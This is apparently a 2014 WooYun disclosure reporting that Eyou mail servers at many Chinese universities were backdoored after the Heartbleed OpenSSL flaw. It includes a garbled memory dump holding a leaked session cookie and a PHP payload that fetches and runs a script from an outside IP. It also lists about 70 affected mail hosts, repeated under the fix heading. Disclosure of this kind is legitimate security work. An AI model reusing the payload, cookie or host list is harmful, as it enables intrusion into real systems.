当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-056812

漏洞标题:亿中邮邮件系统大量被入侵安装后门

相关厂商:北京亿中邮信息技术有限公司

漏洞作者: w5r2

提交时间:2014-04-12 16:09

修复时间:2014-05-27 16:10

公开时间:2014-05-27 16:10

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-12: 细节已通知厂商并且等待厂商处理中
2014-04-15: 厂商已经确认,细节仅向厂商公开
2014-04-25: 细节向核心白帽子及相关领域专家公开
2014-05-05: 细节向普通白帽子公开
2014-05-15: 细节向实习白帽子公开
2014-05-27: 细节向公众公开

简要描述:

最近爆发的openssl漏洞。导致一些人 进入系统安装木马,详细看说明,在下面。

详细说明:

@SC[r+H9w3f"!98532ED/AI42##mail.cuit.edu.cn42it.edu.cnEjtJl%L3A]*.-SfQ7,s1^l1dnt15R;dnt1Fp[.0cookie9emLoginUser=lliu1980; EMPHPSID=cae94rrn3jjorbe1g89m8grht1dnt1`~6&kM\t:) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25Content-Type: application/x-www-form-urlencodedContent-Length: 77

Connection: close<?php system("wget http://94.23.204.157/lol.c -O /tmp/shz;perl /tmp/shz");

?>bfn{fgb`9vyKQ|<R5HdL?;zTb3,8eK_tpl_id\"><\/span>\n <\/td>\n <\/tr-->\n <tr>\n <th width=\"25%\">\u662f\u5426\u5f00\u542f\u81ea\u52a8\u56de\u590d:<\/th>\n <td>\n <input type=\"radio\" name=\"reply_is_opened\" value=\"1\" id=\"reply_is_opened1_eyou_tpl_id\" \/> \u662f \n &nbsp;&nbsp;\n <input type=\"radio\" name=\"reply_is_opened\" value=\"0\" id=\"reply_is_opened0_eyou_tpl_id\"\/> \u5426 \n <font color=\"red\"><span id=\"reply_extra_fail_eyou_tpl_id\"><\/span><\/font>\n <\/td>\n <\/tr>\n <tr>\n <th width=\"25%\">\u81ea\u52a8\u56de\u590d\u7684\u8303\u56f4:<\/th>\n <td>\n <input type=\"radio\" name=\"reply_scope\" value=\"0\" id=\"reply_scope0_eyou_tpl_id\" \/> \u5168\u90e8\u5730\u5740\u90fd\u56de\u590d \n &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\n &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\n <input type=\"radio\" name=\"reply_scope\" value=\"3\" id=\"reply_scope3_eyou_tpl_id\"\/> \u53ea\u56de\u590d\u901a\u8baf\u5f55\u4e2d\u7684\u5730\u5740\n <br \/>\n <input type=\"radio\" name=\"reply_scope\" value=\"1\" id=\"reply_scope1_eyou_tpl_id\"\/> \u4e0d\u56de\u590d\u9ed1\u540d\u5355\u4e2d\u7684\u5730\u5740 \n &nbsp;&nbsp;&nbsp;\n <input type=\"radio\" name=\"reply_scope\" value=\"2\" id=\"reply_scope2_eyou_tpl_id\"\/> \u53ea\u56de\u590d\u767d\u540d\u5355\u4e2d\u7684\u5730\u5740\n \n \n <font color=\"red\"><span id=\"reply_scope_f`A6K:K: ngix/1:+:;:]Tranpg: cp &)+/4:@OZnW "#$$$$&'(()+,,./0017:=>@@@@ADEHHJNPQTVX]_`bblnsy{~&8KY~)^[ 2R879\u8bbe\u7f6e\u53ef\u4ee5\u6539\u53d8\u6240\u56de\u590d\u7684\u4fe1\u4ef6\u4e2d\u5305\u542b\u539f\u6587\u7684\u957f\u77ed\u3002<\/p>\n

漏洞证明:

下面列举一些站点。打包一下。

mail.sues.edu.cn
mail.hpu.edu.cn
mail.bnuz.edu.cn
mail.hqu.edu.cn
mail.bjtu.edu.cn
mail.tjut.edu.cn
mail.ccut.edu.cn
mail.cuit.edu.cn
mail.ntu.edu.cn
mail.haust.edu.cn
mail.qdu.edu.cn
mail.shupl.edu.cn
mail.btbu.edu.cn
mail.shmtu.edu.cn
mail.qhnu.edu.cn
mail.scau.edu.cn
mail.lyu.edu.cn
mail.cug.edu.cn
mail.bigc.edu.cn
mail.xmut.edu.cn
mail.dlnu.edu.cn
mail.jssvc.edu.cn
mail.xisu.edu.cn
mail.jstu.edu.cn
mail.xbmu.edu.cn
mail.xtu.edu.cn
mail.nau.edu.cn
mail.lit.edu.cn
mail.hubu.edu.cn
mail.ybu.edu.cn
mail.tust.edu.cn
mail.hainnu.edu.cn
mail.lntu.edu.cn
mail.zjc.zjut.edu.cn
mail.njnu.edu.cn
mail.just.edu.cn
mail.snut.edu.cn
mail.njtu.edu.cn
mail.usc.edu.cn
mail.hist.edu.cn
mail.whpu.edu.cn
mail.haut.edu.cn
mail.sust.edu.cn
mail.sqnc.edu.cn
mail.hunau.edu.cn
mail.jcut.edu.cn
mail.tyut.edu.cn
mail.tjuci.edu.cn
mail.dzu.edu.cn
mail.cmc.edu.cn
mail.hunnu.edu.cn
mail.tsmc.edu.cn
mail.utibet.edu.cn
mail.jnxy.edu.cn
mail.jliae.edu.cn
mail.sei.pku.edu.cn
mail.tjutcm.edu.cn
mail.shec.edu.cn
mail.gzccc.edu.cn
mail.jxau.edu.cn
mail.guat.edu.cn
mail.hbpu.edu.cn
mail.wtu.edu.cn
mail.hiu.edu.cn
mail.glcat.edu.cn
mail.huat.edu.cn
mail.dlu.edu.cn
mail.hitsz.edu.cn
mail.sdca.edu.cn
mail.zknu.edu.cn
mail.cczu.edu.cn
mail.swfu.edu.cn
mail.ndnu.edu.cn

修复方案:

下面列举一些站点。打包一下。

mail.sues.edu.cn
mail.hpu.edu.cn
mail.bnuz.edu.cn
mail.hqu.edu.cn
mail.bjtu.edu.cn
mail.tjut.edu.cn
mail.ccut.edu.cn
mail.cuit.edu.cn
mail.ntu.edu.cn
mail.haust.edu.cn
mail.qdu.edu.cn
mail.shupl.edu.cn
mail.btbu.edu.cn
mail.shmtu.edu.cn
mail.qhnu.edu.cn
mail.scau.edu.cn
mail.lyu.edu.cn
mail.cug.edu.cn
mail.bigc.edu.cn
mail.xmut.edu.cn
mail.dlnu.edu.cn
mail.jssvc.edu.cn
mail.xisu.edu.cn
mail.jstu.edu.cn
mail.xbmu.edu.cn
mail.xtu.edu.cn
mail.nau.edu.cn
mail.lit.edu.cn
mail.hubu.edu.cn
mail.ybu.edu.cn
mail.tust.edu.cn
mail.hainnu.edu.cn
mail.lntu.edu.cn
mail.zjc.zjut.edu.cn
mail.njnu.edu.cn
mail.just.edu.cn
mail.snut.edu.cn
mail.njtu.edu.cn
mail.usc.edu.cn
mail.hist.edu.cn
mail.whpu.edu.cn
mail.haut.edu.cn
mail.sust.edu.cn
mail.sqnc.edu.cn
mail.hunau.edu.cn
mail.jcut.edu.cn
mail.tyut.edu.cn
mail.tjuci.edu.cn
mail.dzu.edu.cn
mail.cmc.edu.cn
mail.hunnu.edu.cn
mail.tsmc.edu.cn
mail.utibet.edu.cn
mail.jnxy.edu.cn
mail.jliae.edu.cn
mail.sei.pku.edu.cn
mail.tjutcm.edu.cn
mail.shec.edu.cn
mail.gzccc.edu.cn
mail.jxau.edu.cn
mail.guat.edu.cn
mail.hbpu.edu.cn
mail.wtu.edu.cn
mail.hiu.edu.cn
mail.glcat.edu.cn
mail.huat.edu.cn
mail.dlu.edu.cn
mail.hitsz.edu.cn
mail.sdca.edu.cn
mail.zknu.edu.cn
mail.cczu.edu.cn
mail.swfu.edu.cn
mail.ndnu.edu.cn

版权声明:转载请注明来源 w5r2@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-04-15 10:52

厂商回复:

确实与我公司使用的OpenSSL有关,已为用户提供解决方案,多谢提供!

最新状态:

暂无


漏洞评价:

评论

  1. 2014-04-13 12:56 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    心脏出血漏洞的影响的开始体现出来了

  2. 2014-04-13 20:18 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @疯狗 某些人微博说这货没有影响。

  3. 2014-05-27 16:13 | Yatere ( 路人 | Rank:0 漏洞数:1 | 喜欢脚本)

    一定是美帝

  4. 2014-05-27 16:50 | 水泥中的鱼 ( 路人 | Rank:30 漏洞数:4 | 我就是我,尘世中一迷途小书童。)

    呃,这是怎么发现的。感觉群伤了啊

  5. 2014-05-28 14:57 | Smilent ( 实习白帽子 | Rank:34 漏洞数:6 | None)

    ~~.

  6. 2014-05-29 10:22 | TT向上 ( 路人 | Rank:8 漏洞数:5 | 慢慢逗你玩)

    这是怎么检测出来的?求指导。